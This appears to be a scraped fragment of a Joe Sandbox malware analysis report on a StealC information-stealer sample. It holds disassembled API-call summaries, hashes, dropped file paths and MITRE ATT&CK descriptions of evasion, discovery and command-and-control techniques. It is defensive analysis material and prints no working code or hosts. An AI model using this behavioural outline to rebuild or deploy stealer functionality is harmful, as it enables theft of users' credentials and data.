ExitProcess.KERNEL32 ref: 007F6829

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: 0569bc7b1baef011b1d5f18f92e0980500673e7c4994d19c3b91acff0631d546
Instruction ID: cf9c85150ad526cce754cb7dd54ac91f718d67ddc49d4e623eec2116d633b560
Opcode Fuzzy Hash: 0569bc7b1baef011b1d5f18f92e0980500673e7c4994d19c3b91acff0631d546
Instruction Fuzzy Hash: BBF01CB094461DEFE720BBA0DC4AFBE7B75BF04751F208528B726A52D0CBB85501CA72

Function 007EBB47 Relevance: 5.3, APIs: 4, Instructions: 274stringCOMMON

Download Yara Rule

APIs

Part of subcall function 007FA377: lstrcpy.KERNEL32(00420DFF,00000000), ref: 007FA3BF

Part of subcall function 007FA5E7: lstrlen.KERNEL32(?,0062C9F0,?,00424EAC,00420DFF), ref: 007FA5FC
Part of subcall function 007FA5E7: lstrcpy.KERNEL32(00000000), ref: 007FA63B
Part of subcall function 007FA5E7: lstrcat.KERNEL32(00000000,00000000), ref: 007FA649

Part of subcall function 007FA557: lstrcpy.KERNEL32(00000000,?), ref: 007FA5A9
Part of subcall function 007FA557: lstrcat.KERNEL32(00000000), ref: 007FA5B9

Part of subcall function 007FA4D7: lstrcpy.KERNEL32(?,00420DFF), ref: 007FA53C

Part of subcall function 007EA0C7: memcmp.MSVCRT ref: 007EA0E2
Part of subcall function 007EA0C7: memset.MSVCRT ref: 007EA115
Part of subcall function 007EA0C7: LocalAlloc.KERNEL32(00000040,?), ref: 007EA165

lstrlen.KERNEL32(00000000), ref: 007EBD44

Part of subcall function 007F8B37: LocalAlloc.KERNEL32(00000040,-00000001), ref: 007F8B59

StrStrA.SHLWAPI(00000000,00421384), ref: 007EBD72
lstrlen.KERNEL32(00000000), ref: 007EBE4A
lstrlen.KERNEL32(00000000), ref: 007EBE5E

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$AllocLocallstrcat$memcmpmemset
String ID:
API String ID: 2910778473-0
Opcode ID: 9e24c490cf1f2ca87493fc311d0a9bdef26fe52ce2e60194aff9f78403638455
Instruction ID: 068d31c4b57e096d729065c449acc79bdea43751eed71eff9066bcd63a89eb4e
Opcode Fuzzy Hash: 9e24c490cf1f2ca87493fc311d0a9bdef26fe52ce2e60194aff9f78403638455
Instruction Fuzzy Hash: 60A154B190025CEBCB14FBA4CC9AEFE7739AF14300F504159F64A67191EF786A08DB66

Function 004136EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16filestringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,?), ref: 00413445
StrCmpCA.SHLWAPI(?,00420F40), ref: 00413457
StrCmpCA.SHLWAPI(?,00420F44), ref: 0041346D
FindNextFileA.KERNEL32(000000FF,?), ref: 00413777
FindClose.KERNEL32(000000FF), ref: 0041378C

Strings

18A, xrefs: 00413792

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: Find$CloseFileNextlstrcat
String ID: 18A
API String ID: 3840410801-3433864008
Opcode ID: 49cf058315f9c5358b0b7654ddb42a2a71d8f144f9820a7364e7d007e4a2873d
Instruction ID: 37f096532bd63c7a6543046c1d18d9a97d222ba567e71f558b3b71d2575676c5
Opcode Fuzzy Hash: 49cf058315f9c5358b0b7654ddb42a2a71d8f144f9820a7364e7d007e4a2873d
Instruction Fuzzy Hash: 26D05BB150410D5BCB20EF54EE589EE7339AF54355F0041C9F40E97150EB349B85CF95

Function 007F4C87 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 007F8AE7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007F8B12

lstrcat.KERNEL32(?,00000000), ref: 007F4CC1
lstrcat.KERNEL32(?,00421040), ref: 007F4CDE
lstrcat.KERNEL32(?,0062CDF8), ref: 007F4CF2
lstrcat.KERNEL32(?,00421044), ref: 007F4D04

Part of subcall function 007F4657: wsprintfA.USER32 ref: 007F4673
Part of subcall function 007F4657: FindFirstFileA.KERNEL32(?,?), ref: 007F468A

Part of subcall function 007F4657: StrCmpCA.SHLWAPI(?,00420FAC), ref: 007F46B8
Part of subcall function 007F4657: StrCmpCA.SHLWAPI(?,00420FB0), ref: 007F46CE
Part of subcall function 007F4657: FindNextFileA.KERNEL32(000000FF,?), ref: 007F48C4
Part of subcall function 007F4657: FindClose.KERNEL32(000000FF), ref: 007F48D9

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID:
API String ID: 2667927680-0
Opcode ID: d1724fa503c2ef21903714147b9395ab02af98666ae4bef9163d680f583798e8
Instruction ID: a46060d59f7ee7406cd09d1b1b993ebb1b04c973f4576d0d850a2cdb3e23febf
Opcode Fuzzy Hash: d1724fa503c2ef21903714147b9395ab02af98666ae4bef9163d680f583798e8
Instruction Fuzzy Hash: 9121DD76900208EBC724FBA0DC4AEFD373DAF59700F408595B78993191DE7956C98BA2

Function 00414A20 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00418880: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 004188AB

lstrcat.KERNEL32(?,00000000), ref: 00414A5A
lstrcat.KERNEL32(?,00421040), ref: 00414A77
lstrcat.KERNEL32(?,0084D6F0), ref: 00414A8B
lstrcat.KERNEL32(?,00421044), ref: 00414A9D

Part of subcall function 004143F0: wsprintfA.USER32 ref: 0041440C
Part of subcall function 004143F0: FindFirstFileA.KERNEL32(?,?), ref: 00414423

Part of subcall function 004143F0: StrCmpCA.SHLWAPI(?,00420FAC), ref: 00414451
Part of subcall function 004143F0: StrCmpCA.SHLWAPI(?,00420FB0), ref: 00414467
Part of subcall function 004143F0: FindNextFileA.KERNEL32(000000FF,?), ref: 0041465D
Part of subcall function 004143F0: FindClose.KERNEL32(000000FF), ref: 00414672

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID:
API String ID: 2667927680-0
Opcode ID: 28dcdced1245b3b083f390d6aa6e37310f4f12f42729f7b19a1ac6063d8d4c06
Instruction ID: 8dbf70b05384144c92fb0b395b2fe843caac1dc39a8cdd365ca80c12b48963c0
Opcode Fuzzy Hash: 28dcdced1245b3b083f390d6aa6e37310f4f12f42729f7b19a1ac6063d8d4c06
Instruction Fuzzy Hash: B6214F76A002086BC724FBA0EC42EDD373DAF94304F40845EB94A571D1EE7856C98BA5

Function 007F8F67 Relevance: 5.0, APIs: 4, Instructions: 41stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(?,?), ref: 007F8F73
lstrcpyn.KERNEL32(0062D378,?,?), ref: 007F8F97
lstrlen.KERNEL32(?), ref: 007F8FAE
wsprintfA.USER32 ref: 007F8FCE

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID:
API String ID: 1206339513-0
Opcode ID: 95580f9ef10e992e71bb9d5f92c0387debde11b91ee44bd877bd47b6543a2d40
Instruction ID: 39042923dadcbd750c5fd3c03ff2d6d388cd5a66f4a8cbd2824e4c7eae84c5be
Opcode Fuzzy Hash: 95580f9ef10e992e71bb9d5f92c0387debde11b91ee44bd877bd47b6543a2d40
Instruction Fuzzy Hash: 22012CB5500A08FFDB14DFA8D988EBE7BBAEF49354F108148F9099B300C731AA41CB91

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 4h1Zc12ZBe.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_169F.tmp.exe_ed3ab59d9f6ad851eac909f69cfe9f5ed6ba974_f2f091c5_808bb754-d95e-4350-97da-f57f90168c55\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1F69.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2219.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2259.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\ScreenUpdateSync[1].exe

C:\Users\user\AppData\Local\Temp\169F.tmp.exe

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Windows Analysis Report
4h1Zc12ZBe.exe

Function 00401132 Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 169
registrysynchronizationCOMMON

Function 00401F05 Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 133
networkfilesynchronizationCOMMON

Function 00401938 Relevance: 52.7, APIs: 25, Strings: 5, Instructions: 232
windowkeyboardfileCOMMON

Function 0042AF30 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300
COMMONLIBRARYCODE

Function 00435558 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 00402580 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33
networkCOMMON

Function 0040494D Relevance: 9.1, APIs: 6, Instructions: 82
COMMON

Function 00401E67 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56
COMMON

Function 00404A9C Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Function 004260AC Relevance: 4.6, APIs: 3, Instructions: 54
threadCOMMONLIBRARYCODE

Function 0042C8C1 Relevance: 4.6, APIs: 3, Instructions: 50
COMMONLIBRARYCODE

Function 0042600C Relevance: 4.5, APIs: 3, Instructions: 31
threadCOMMON

Function 00401D3B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64
COMMON

Function 00425F58 Relevance: 3.0, APIs: 2, Instructions: 38
threadCOMMON

Function 0042C2F2 Relevance: 1.7, APIs: 1, Instructions: 151
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre